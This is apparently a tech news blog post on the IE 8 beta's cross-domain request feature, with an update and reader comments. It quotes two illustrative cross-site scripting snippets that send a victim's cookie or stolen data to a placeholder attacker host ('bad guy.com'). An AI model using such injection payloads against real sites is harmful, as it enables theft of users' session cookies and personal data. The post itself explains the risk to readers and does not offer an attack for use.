IE 8: Cross scripting defense a double-edged sword

IE 8: Cross scripting defense a double-edged sword

Summary: Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

SHARE:
4

Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.

Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

For instance, Websense hones in on IE 8's cross domain request restrictions. Frankly, Websense's post is a bit over my head, but the money excerpt is notable.

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<imgsrc="http://bad guy.com/steal.php?cookie=" + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest(); xdr.open("POST", "http://www.bad guy.com/"); xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By time IE 8 clears its beta hurdles there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

Update: Tweaked the headline. Websense got back to me with the following clarification. In a nutshell, I goofed. Websense clarifies:

The new ability of cross-domain requests does not really increase the attack surface, but simply provides an additional, easier means to communicate externally. As you can see this provides benefits not only to developers but to malicious folks as well.

Topics: Security, Browser, Microsoft

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

4 comments
Log in or register to join the discussion
  • Same as It Ever Was

    IE 8 Beta is merely the news hook. Security is an cycle of better
    locks and better lock picks. This cycle applies to everyone's
    browsers, not just IE.

    I suspect that Microsoft will mitigate the issue identified above
    as they have done in IE7 by maintaining blacklists of dangerous
    sites and requiring a call in to vet any potentially dangerous
    transaction. That means it will be a race to snag victims before
    the site is identified to the guardians and/or figuring out ways
    to increase the guardians' false positives rendering them
    ineffective.
    DannyO_0x98
    • Still MS sw

      So you believe this kind of plain basic mistake will be mitigated somehow? Good luck to you.. MS covers one hole to show ten others.
      green alien
  • another article that has no meaning

    why did you waste our time with this article. this is not a new security hole. it functionality that ms has been giving the user forever. unfortunately, it can be used for ill as well as good.

    bruce
    bruce@...
  • RE: IE 8: Threats will evolve to elude Microsoft's new security features

    I think someone at MS is in serious need of some mental health services!
    wolfpack99